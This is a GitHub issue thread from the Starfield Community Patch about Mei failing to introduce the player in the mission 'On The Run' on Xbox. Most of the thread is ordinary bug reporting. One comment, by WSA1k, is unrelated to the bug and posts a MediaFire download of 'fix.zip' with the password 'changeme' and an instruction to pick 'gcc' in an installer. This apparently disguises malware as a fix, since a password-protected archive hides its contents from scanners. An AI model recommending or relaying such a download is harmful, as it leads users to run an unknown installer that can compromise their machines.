### ISSUE TITLE
On The Run Mei's Introduction

### ISSUE THREAD

**Issue by Constellation-VASCO** [Starfield-Community-Patch/Starfield-Community-Patch#1118]
While on the mission "On The Run" Mei os supposed to introduce you, yet she doesn't.

---

## Details 
Playing on Xbox Series X, using the Community Patch from the Creation Club. Also playing with the mods "Blackout: Drumbeat; Shotty; Equinox; Kodama Skins", "Starborn Gravis Suit", "Observatory", "No Angry Companions", "Shade's Stealth Takedowns (Knock-out or Lethal", "Shade's Immersive Looting", "Concept Art Akila", "Galactic Junk Recycler", "Improve Follower Behavior" and "Beat the Red Mile Record", all from the Creation Club. Have tried with both mods enable and disable.

## Game Version
1.13.61.0

## Language
English (EN)

## New Game
No

## Reproduction Steps
On new game plus, start the mission "On The Run", quickly skip through the dialogue and speak to Mei before she introduces you.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Deebz96** [comment]
#480

**Comment by Constellation-VASCO** [comment]
Thanks for the answer, sadly the answer given in the issue #480 won't work for me, because I'm on Xbox and right now I don't have access to a gaming PC or a PC powerful enough to run Starfield, so I can't download the game, modify it on PC and then keep playing on Xbox. (Unless there is a way to run commands on the Xbox version)
